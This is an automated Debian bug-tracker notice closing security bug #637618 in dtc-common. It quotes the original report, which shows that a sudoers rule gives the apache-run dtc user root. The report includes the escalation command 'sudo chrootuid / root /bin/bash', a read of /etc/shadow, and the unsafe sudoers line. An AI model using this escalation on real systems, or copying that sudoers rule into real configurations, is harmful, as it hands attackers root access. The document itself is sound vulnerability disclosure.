Your message dated Mon, 19 Dec 2011 10:55:19 +0800
with message-id <4eeea797.9020...@goirand.fr>
and subject line Also fixed in Lenny
has caused the Debian Bug report #637618,
regarding dtc-common: giving sudo access to chrootuid is giving access to root
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
637618: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=637618
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: dtc-common
Severity: critical
Tags: security
Justification: root security hole
the install script gives sudo access to the dtc user (the user that is running
apache) unrestricted access to chrootuid, which essentially gives root access
to the dtc account:
root@testdtc:/var/lib/dtc/etc# su - dtc
$ whoami
dtc
$ sudo chrootuid / root /bin/bash
root@testdtc:/# whoami
root
root@testdtc:/# wc -l /etc/shadow
27 /etc/shadow
rot@testdtc:/# grep dtc /etc/sudoers
Defaults:dtc !set_logname
dtc ALL= NOPASSWD: /usr/bin/chrootuid *
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
--- End Message ---
--- Begin Message ---
--- End Message ---
